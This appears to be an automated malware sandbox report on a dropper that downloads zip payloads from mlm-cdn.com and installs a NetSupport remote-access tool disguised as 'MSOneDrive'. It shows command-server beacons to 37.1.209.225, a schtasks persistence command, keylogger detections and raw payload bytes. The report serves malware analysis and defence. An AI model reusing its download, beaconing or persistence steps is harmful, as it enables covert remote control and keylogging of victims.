• 37.1.209.225 (connection: keep-alive, cmd=poll, info=1, ack=1)
• geo.netsupportsoftware.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49704 | 37.1.209.225 | 443 | 7384 | C:\Users\user\AppData\Local\MSOneDrive\client32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 21, 2024 14:45:39.583432913 CEST | 216 | OUT | POST http://37.1.209.225/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 37.1.209.225
Connection: Keep-Alive

CMD=POLL
INFO=1
ACK=1
Data Raw:
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49705 | 172.67.68.212 | 80 | 7384 | C:\Users\user\AppData\Local\MSOneDrive\client32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 21, 2024 14:45:40.596533060 CEST | 118 | OUT | GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 21, 2024 14:45:41.241857052 CEST | 933 | IN | HTTP/1.1 200 OK
Date: Sat, 21 Sep 2024 12:45:41 GMT
Content-Type: text/html; Charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8c6a275b3aec4249-EWR
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Origin: *
Cache-Control: private
Set-Cookie: ASPSESSIONIDSSBTACBQ=OBMMKFKCAJDFNNMPEMKBIMDJ; path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Accept-Encoding
cf-apo-via: origin,host
Referrer-Policy: strict-origin-when-cross-origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ey%2BwzqINPOAVsMVzAdkyxkgC8tUn91QDBYNKiBhAJFx1hAgRcjGJZ7Isg%2BxXms5JO%2BzSch6PLRjQLVeEU0iUJpwHUaCElpVyo0seBm7IRMTXhYFDA5aahOPbHfa2E2DBqXqfwAlJGTwc9TBY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
Data Ascii:
10
40.7357,-74.1724
0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.7 | 63016 | 37.1.209.225 | 443 | 7384 | C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 21, 2024 14:46:34.955997944 CEST | 216 | OUT | POST http://37.1.209.225/fakeurl.htm HTTP/1.1
                                                      User-Agent: NetSupport Manager/1.3
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 22
                                                      Host: 37.1.209.225
                                                      Connection: Keep-Alive
                                                      CMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      3 | 192.168.2.7 | 63017 | 37.1.209.225 | 443 | 7384 | C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 21, 2024 14:47:08.284018040 CEST | 216 | OUT | POST http://37.1.209.225/fakeurl.htm HTTP/1.1
                                                      User-Agent: NetSupport Manager/1.3
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 22
                                                      Host: 37.1.209.225
                                                      Connection: Keep-Alive
                                                      CMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.7 | 63018 | 37.1.209.225 | 443 | 7384 | C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 21, 2024 14:47:42.637018919 CEST | 216 | OUT | POST http://37.1.209.225/fakeurl.htm HTTP/1.1
                                                      User-Agent: NetSupport Manager/1.3
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 22
                                                      Host: 37.1.209.225
                                                      Connection: Keep-Alive
                                                      CMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.7 | 63019 | 37.1.209.225 | 443 | 7384 | C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 21, 2024 14:48:15.550273895 CEST | 216 | OUT | POST http://37.1.209.225/fakeurl.htm HTTP/1.1
                                                      User-Agent: NetSupport Manager/1.3
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 22
                                                      Host: 37.1.209.225
                                                      Connection: Keep-Alive
                                                      CMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.7 | 63020 | 37.1.209.225 | 443 | 7384 | C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 21, 2024 14:48:48.769455910 CEST | 216 | OUT | POST http://37.1.209.225/fakeurl.htm HTTP/1.1
                                                      User-Agent: NetSupport Manager/1.3
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 22
                                                      Host: 37.1.209.225
                                                      Connection: Keep-Alive
                                                      CMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.7 | 63021 | 37.1.209.225 | 443 | 7384 | C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 21, 2024 14:49:21.959918976 CEST | 216 | OUT | POST http://37.1.209.225/fakeurl.htm HTTP/1.1
                                                      User-Agent: NetSupport Manager/1.3
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 22
                                                      Host: 37.1.209.225
                                                      Connection: Keep-Alive
                                                      CMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.7 | 49700 | 142.11.212.184 | 443 | 4504 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-09-21 12:45:31 UTC | 49 | OUT | GET /ssd/sdn1.zip HTTP/1.1
                                                      Host: mlm-cdn.com
                                                      2024-09-21 12:45:31 UTC | 264 | IN | HTTP/1.1 200 OK
                                                      Date: Sat, 21 Sep 2024 12:45:31 GMT
                                                      Server: Apache
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Last-Modified: Sat, 10 Aug 2024 18:46:12 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 1541147
                                                      Vary: Accept-Encoding
                                                      Content-Type: application/zip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.7 | 49701 | 142.11.212.184 | 443 | 4504 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-09-21 12:45:35 UTC | 49 | OUT | GET /ssd/sdn2.zip HTTP/1.1
                                                      Host: mlm-cdn.com
                                                      2024-09-21 12:45:36 UTC | 263 | IN | HTTP/1.1 200 OK
                                                      Date: Sat, 21 Sep 2024 12:45:36 GMT
                                                      Server: Apache
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Last-Modified: Sat, 10 Aug 2024 18:46:12 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 227999
                                                      Vary: Accept-Encoding
                                                      Content-Type: application/zip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.7 | 49702 | 142.11.212.184 | 443 | 4504 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-09-21 12:45:37 UTC | 49 | OUT | GET /ssd/sdn3.zip HTTP/1.1
                                                      Host: mlm-cdn.com
                                                      2024-09-21 12:45:37 UTC | 262 | IN | HTTP/1.1 200 OK
                                                      Date: Sat, 21 Sep 2024 12:45:37 GMT
                                                      Server: Apache
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Last-Modified: Sat, 10 Aug 2024 18:46:13 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 81710
                                                      Vary: Accept-Encoding
                                                      Content-Type: application/zip
                                                      Data Ascii: cuY\aO"_]Q}~B_bLdRX{3fa1gY0$U3=S!vsGj3AsBxINZ/By:K45s%^oA/aDRA&[2;V.U*FkJQY4c jaUD59G}a>dGq,umuvk>Bz8WWe,
                                                      2024-09-21 12:45:37 UTC8000INData Raw: eb 6f a5 d5 d4 03 a2 71 71 b4 63 9c 46 a4 2e 30 51 e7 9b 0c 55 3d a2 9f 30 72 d0 68 2b f7 02 83 64 04 9b 76 e2 fa 4a 0b a6 3f 43 f4 f3 74 94 20 5b 04 95 ae f5 ef 7c 10 07 b6 0c 1e cf 77 88 ea 05 8c d2 cc 62 c0 0b 58 35 61 bc 2a 53 4d 3a 4f 2f 3a 59 89 39 1b 25 66 d5 56 89 0b b6 b3 20 7b 14 4e 1d 4b 74 0d 0b 30 da 12 d2 1f 6d e2 85 d8 1f 0f 5d 85 d0 90 72 1d a3 b9 c9 2a ff d7 99 50 5c 24 9c 18 4f 03 d7 7e 82 8b 92 32 9e d4 9f 2b c8 8a c0 a6 10 82 ec 61 36 5d c2 ee 59 96 7d 4d 90 85 df 54 38 98 83 f3 ed 19 f1 f4 ab 27 df aa bb 53 61 e4 68 e3 6b 76 d0 28 c7 55 31 6c 20 5a 75 9d 1c 59 d1 77 d6 56 74 60 bc 17 db 5d e5 cc 9c b3 38 5b 8b 8a 0f a3 bd d6 91 6b 27 cf 02 53 4d 04 d9 f7 21 d9 33 33 ec 42 1c 41 f6 0d 5c 84 b7 64 66 3c 34 48 02 7f ee a6 43 78 c3 d2 9f
                                                      Data Ascii: oqqcF.0QU=0rh+dvJ?Ct [|wbX5a*SM:O/:Y9%fV {NKt0m]r*P\$O~2+a6]Y}MT8'Sahkv(U1l ZuYwVt`]8[k'SM!33BA\df<4HCx
                                                      2024-09-21 12:45:37 UTC8000INData Raw: 53 1f b1 8a 0f 94 ef ad 78 1f c4 97 9a 14 1d a3 98 a6 48 c6 e2 21 0f 8c 8f 14 c6 24 a5 a4 ab d2 14 bd a8 f7 85 1b 85 4e 4a 99 96 9c 20 84 a6 4b 4a 4f 98 82 ed 6e c0 80 7c 91 ac 98 31 3e b2 a1 6d a7 c7 29 a3 27 27 29 9a 90 d1 80 a8 69 1c 70 8f 1c 35 0a ef 1c 4d 92 05 51 93 54 b1 4a 61 9a 42 a9 4a 4b 4e 48 86 4c 26 bd 53 3b 0d 68 de 57 df ef 2d b4 51 bc 58 c5 bf 6a 8b 0f f2 4f 42 9a 52 05 54 c7 26 a4 37 56 d1 b4 e8 d4 f7 f0 e1 7b db fb 5f b5 df bf 6a b7 74 a8 b2 e8 34 b6 ca a1 66 8c 10 e9 f9 52 11 17 ad 4a 52 7e a0 aa 1a f0 7f 30 3d 4b 7c 13 df 49 60 27 8d f0 4e 9f d5 77 56 f4 57 42 ff 4e 89 d3 e3 40 de c0 b2 4e d6 b7 2c fa c5 35 d8 a3 bc 28 6a 0e 40 4f 00 4f 4f 2f ca db db 8b ea 01 f6 81 00 fd 01 1c 00 fa 62 9c 39 10 a7 27 98 98 06 cf 63 a0 5c ef 43 51 fd
                                                      Data Ascii: SxH!$NJ KJOn|1>m)'')ip5MQTJaBJKNHL&S;hW-QXjOBRT&7V{_jt4fRJR~0=K|I`'NwVWBN@N,5(j@OOO/b9'c\CQ
                                                      2024-09-21 12:45:37 UTC8000INData Raw: 53 07 bb b4 9e 61 26 1e 11 33 20 af ff ed a3 8a ad dc a9 b6 65 9f bc 3c c3 7b 3c 4d f3 a5 d5 ae 1f ae 79 f7 ab d8 6e bb b3 c8 82 a3 9a 72 73 5a 65 4c 4c 67 d7 f9 09 9a 23 db 65 de c9 e3 26 2e db 30 fe f4 7a d1 42 11 63 ba c7 b7 c8 52 e0 fe eb 94 6d 61 39 2f f3 44 8a 97 29 c5 f7 3a ed 52 2b 13 bc 77 1c 8f 97 ee ba 3b 45 bc 76 3f af 3c c3 2c c8 f7 c1 b3 05 b1 81 db 9e a6 ef 34 5f fd 38 49 f1 cd d1 d1 e3 ed d6 45 74 28 9e 19 38 27 75 fb aa 8e 0b da ed 58 54 b9 ff 64 cb 4c 3b df 4b 6d db f5 a9 9f b0 ce d6 e1 be ec e9 c3 c3 17 a7 8c e8 1d 65 f6 60 79 f0 a7 f7 8a 6a 4b eb 5f fe ea ed 14 d8 5a e8 ba 98 7b ff c0 76 8b c0 75 96 2b 3d 9a c5 7d 39 66 42 9f 4d 07 f9 5b 44 ee 9e a5 81 ae 2e 73 d6 fd fc a0 f0 e2 8b e6 d3 5f ce 33 eb e8 7b ea 33 97 ca 8b 9f 9e dd 37 9f
                                                      Data Ascii: Sa&3 e<{<MynrsZeLLg#e&.0zBcRma9/D):R+w;Ev?<,4_8IEt(8'uXTdL;Kme`yjK_Z{vu+=}9fBM[D.s_3{37
                                                      2024-09-21 12:45:37 UTC8000INData Raw: 31 9e ff d7 ee 49 ce 03 22 a7 06 0c 7d b6 61 41 eb 0c d1 82 d6 73 1a f8 ca d4 94 e3 b8 a0 75 12 f8 c5 37 59 b6 6d 3d 16 bc 46 83 98 6f ba 6c 6b 62 86 b3 59 4b f3 16 06 46 b4 e2 70 73 33 5f 73 33 5f 8a 32 9f 03 73 eb f1 ee 76 44 46 7f 77 d1 36 6c 4e 57 df bb 1b b3 3e 3f a9 cd 99 3f 30 e4 6a d4 91 17 5f f5 2d 8f 7b d4 eb e6 ae d8 cc 7d 41 33 af 9a b4 a1 76 eb 46 cd 58 d8 7d 74 6b 0f 9e 97 e8 8e 43 cb 1c 97 9b 53 ac 6c 05 4e 22 a3 dd 0c d7 71 b9 99 8b 37 67 2e fa 6f 72 22 26 77 81 e5 ab 8f 47 8d 3e 1e 35 fa 78 d4 e8 e3 51 a3 8f 47 8d 3e 1e 35 fa 1f 7e d4 e8 e3 2d 93 8f b7 4c 3e de 32 f9 78 cb e4 e3 2d 93 8f b7 4c fe 27 dc 32 71 5c c0 ed 0f e3 5d 9f ff bf 1c 21 5c c0 99 2a ea 60 bc 04 d5 74 36 ff 77 c7 08 5d df 3d 46 b8 fc e0 ab 5d 07 1d 1f 3b 8c 69 7f 66 67
                                                      Data Ascii: 1I"}aAsu7Ym=FolkbYKFps3_s3_2svDFw6lNW>??0j_-{}A3vFX}tkCSlN"q7g.or"&wG>5xQG>5~-L>2x-L'2q\]!\*`t6w]=F];ifg
                                                      2024-09-21 12:45:37 UTC8000INData Raw: 13 ce 6c 44 fb b7 92 e3 75 dd 7e b8 fc c0 b4 be 9b 8e bc 36 bd e6 fe a2 09 9b 5f ec 17 2c 7e b9 ac b0 ef 45 ba d0 cd 48 17 f2 d2 ca b8 1c 8a c3 11 8e 68 7a 7f fb e4 b1 a5 8e b0 75 07 17 16 1f 2f ed 46 7b b6 78 45 09 c0 fe 5b c4 1d ee 58 1e df 87 33 7c 98 b8 17 dd 03 23 ee 82 2e c3 4d 8c ca c2 98 44 23 55 06 75 0e de 29 26 b1 90 f6 c2 9d 1d 04 1d 94 2a 5d 96 d1 a4 11 f7 a4 fd 30 c5 43 d0 39 ce a8 37 6a 8c a2 b8 58 51 92 56 af 85 7d 25 f6 a7 fb e2 3e ae c0 2f 36 36 56 14 c7 98 2c da 2c ad 1a 74 8a 94 8c 29 4f 0b 3b 96 7e a1 bb a7 44 4c 87 4a 42 69 52 c6 03 1a 2e 96 48 e1 5f e8 90 d0 21 e3 e9 d4 b6 ce f9 d1 dd 88 35 1f 6f 25 a3 b6 68 b3 8d 2d b6 06 d3 41 c4 96 4f 60 73 8f c2 9a a9 d3 aa 45 71 46 0d d8 d3 66 1b b4 86 6c 51 8a d1 68 11 a5 c8 c2 e8 42 4e 40 eb
                                                      Data Ascii: lDu~6_,~EHhzu/F{xE[X3|#.MD#Uu)&*]0C97jXQV}%>/66V,,t)O;~DLJBiR.H_!5o%h-AO`sEqFflQhBN@


                                                      Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                      3          | 192.168.2.7 | 49703       | 142.11.212.184  | 443              | 4504 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      Timestamp               | Bytes transferred | Direction | Data
                                                      2024-09-21 12:45:38 UTC | 49                | OUT       | GET /ssd/sdn4.zip HTTP/1.1
                                                      Host: mlm-cdn.com
                                                      2024-09-21 12:45:38 UTC | 263               | IN        | HTTP/1.1 200 OK
                                                      Date: Sat, 21 Sep 2024 12:45:38 GMT
                                                      Server: Apache
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Last-Modified: Sat, 10 Aug 2024 18:46:12 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 464977
                                                      Vary: Accept-Encoding
                                                      Content-Type: application/zip


                                                      Target ID:3
                                                      Start time:08:45:28
                                                      Start date:21/09/2024
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe"
                                                      Imagebase:0xc80000
                                                      File size:140'800 bytes
                                                      MD5 hash:AACE5ED77F7D47CAD3E45E0CCDC5411C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:08:45:38
                                                      Start date:21/09/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "MSOneDrive" /tr "C:\Users\user\AppData\Local/MSOneDrive\client32.exe" /RL HIGHEST
                                                      Imagebase:0xb20000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:08:45:38
                                                      Start date:21/09/2024
                                                      Path:C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local/MSOneDrive\client32.exe
                                                      Imagebase:0x9d0000
                                                      File size:107'376 bytes
                                                      MD5 hash:F6ABEF857450C97EA74CD8F0EB9A8C0A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.1369497547.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 12%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:12
                                                      Start time:08:45:38
                                                      Start date:21/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:08:45:40
                                                      Start date:21/09/2024
                                                      Path:C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local/MSOneDrive\client32.exe
                                                      Imagebase:0x9d0000
                                                      File size:107'376 bytes
                                                      MD5 hash:F6ABEF857450C97EA74CD8F0EB9A8C0A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000000.1388077049.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.1390661255.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                        Execution Graph

                                                        Execution Coverage:5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:14.8%
                                                        Total number of Nodes:1295
                                                        Total number of Limit Nodes:23
10727 c824dd GetTokenInformation CloseHandle 10725->10727 10728 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10726->10728 10727->10726 10729 c82515 10728->10729 10729->10570 10729->10575 10731 c825b0 18 API calls 10730->10731 10732 c81888 10731->10732 10733 c81a63 10732->10733 10734 c81893 GetProcessHeap HeapAlloc SHGetSpecialFolderPathW 10732->10734 10735 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10733->10735 10734->10733 10736 c818c4 10734->10736 10737 c81a70 10735->10737 10738 c86dd0 29 API calls 10736->10738 10737->10567 10739 c818d8 10738->10739 10740 c86120 27 API calls 10739->10740 10741 c818fb 10739->10741 10740->10741 10741->10733 10742 c8197d GetProcessHeap HeapAlloc 10741->10742 10743 c86120 27 API calls 10741->10743 10742->10741 10744 c8199c PathCombineW 10742->10744 10743->10742 10745 c819b4 __CreateFrameInfo 10744->10745 10746 c869e0 71 API calls 10745->10746 10747 c819e6 CreateProcessW 10745->10747 10746->10745 10748 c81a3c GetProcessHeap HeapFree 10747->10748 10749 c81a24 CloseHandle CloseHandle 10747->10749 10748->10741 10749->10748 10751 c82576 ShellExecuteW 10750->10751 10751->10751 10752 c8258e GetProcessHeap HeapFree GetProcessHeap HeapFree ExitProcess 10751->10752 10754 c89c88 10753->10754 10754->10692 10754->10754 10756 c826f9 10755->10756 10757 c825f5 InternetOpenUrlW 10755->10757 10758 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10756->10758 10759 c826ed InternetCloseHandle 10757->10759 10764 c8260f __InternalCxxFrameHandler 10757->10764 10760 c82707 10758->10760 10759->10756 10760->10723 10761 c82630 InternetReadFile 10762 c82658 GetProcessHeap HeapAlloc 10761->10762 10763 c82665 GetProcessHeap RtlReAllocateHeap 10761->10763 10762->10764 10763->10764 10764->10761 10765 c826a7 GetProcessHeap RtlAllocateHeap 10764->10765 10766 c89c70 __InternalCxxFrameHandler 10765->10766 10767 c826cc GetProcessHeap RtlFreeHeap InternetCloseHandle 10766->10767 10767->10759 10902 c87172 10768->10902 10770 
c86e07 __CreateFrameInfo 10771 c86e1c GetCurrentDirectoryW 10770->10771 10772 c86e66 10771->10772 10772->10772 10773 c86e89 10772->10773 10774 c87172 16 API calls 10773->10774 10775 c86e9b 10774->10775 10912 c85360 10775->10912 10777 c86ec5 10778 c87172 16 API calls 10777->10778 10780 c86ecb 10777->10780 10779 c86f42 10778->10779 10779->10714 10780->10714 10782 c86a44 10781->10782 10789 c86a01 10781->10789 10783 c86a7d 10782->10783 10784 c86a65 10782->10784 10788 c86a86 10783->10788 10795 c86ab8 10783->10795 10785 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10784->10785 10787 c86a77 10785->10787 10786 c86b13 10792 c86120 27 API calls 10786->10792 10787->10722 10793 c85540 8 API calls 10788->10793 10789->10782 10790 c86a20 10789->10790 10794 c8c52b ___std_exception_copy 14 API calls 10789->10794 10791 c86a37 10790->10791 11286 c847e0 10790->11286 10797 c8c52b ___std_exception_copy 14 API calls 10791->10797 10798 c86b22 10792->10798 10799 c86aa8 10793->10799 10794->10790 10795->10786 10795->10799 10797->10782 10802 c86b32 10798->10802 10804 c86b6e 10798->10804 10799->10795 10800 c85540 8 API calls 10799->10800 10800->10799 10801 c86830 66 API calls 10803 c86b59 10801->10803 10802->10801 10808 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10803->10808 10805 c86bb7 10804->10805 10806 c86dc4 10804->10806 10807 c86bd4 10804->10807 11290 c827b0 10805->11290 11294 c87097 10806->11294 10807->10805 10809 c86c25 10807->10809 10810 c86b68 10808->10810 10815 c827b0 45 API calls 10809->10815 10810->10722 10813 c86c20 11166 c86830 10813->11166 10815->10813 10817 c86c50 CreateFileW 10818 c86c7b 10817->10818 10819 c86c93 10817->10819 10821 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10818->10821 11237 c85b70 10819->11237 10822 c86c8d 10821->10822 10822->10722 10824 c86ca0 10825 c86ce9 WriteFile 10824->10825 10828 c86d15 10824->10828 11255 c85d40 10824->11255 10825->10824 10825->10828 10826 c86da1 CloseHandle 10829 c86f60 
__ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10826->10829 10827 c86d73 SetFileTime CloseHandle 10827->10826 10830 c86d41 10828->10830 10832 c8c52b ___std_exception_copy 14 API calls 10828->10832 10836 c86d65 10828->10836 10831 c86dbe 10829->10831 10833 c86d58 10830->10833 10834 c847e0 14 API calls 10830->10834 10831->10722 10832->10830 10835 c8c52b ___std_exception_copy 14 API calls 10833->10835 10834->10833 10835->10836 10836->10826 10836->10827 10838 c81e66 GetProcessHeap HeapAlloc GetSystemDirectoryW 10837->10838 10839 c81aa6 RegOpenKeyW lstrlenW RegSetValueExW RegCloseKey 10837->10839 10840 c81e9c GetProcessHeap HeapAlloc 10838->10840 10841 c82485 GetProcessHeap HeapFree 10838->10841 10845 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10839->10845 10846 c82020 wsprintfW GetProcessHeap HeapAlloc 10840->10846 10842 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10841->10842 10844 c8249f 10842->10844 10844->10712 10848 c81e62 10845->10848 10849 c82420 6 API calls 10846->10849 10848->10712 10849->10841 10852 c8614d 10851->10852 10853 c86813 10851->10853 10852->10853 10854 c86158 10852->10854 10855 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10853->10855 10857 c86165 10854->10857 10858 c860b0 14 API calls 10854->10858 10856 c86825 10855->10856 10856->10723 10859 c8619d 10857->10859 10860 c86177 10857->10860 10858->10857 10862 c861a2 10859->10862 10863 c861f8 10859->10863 10861 c8617c 10860->10861 10860->10862 10864 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10861->10864 10865 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10862->10865 10868 c86203 10863->10868 10873 c86235 10863->10873 10866 c86197 10864->10866 10867 c861f2 10865->10867 10866->10723 10867->10723 10871 c85540 8 API calls 10868->10871 10869 c86293 10870 c85540 8 API calls 10869->10870 10872 c862b1 10870->10872 10875 c86225 10871->10875 10874 c85910 7 API calls 10872->10874 10873->10869 10873->10875 10876 
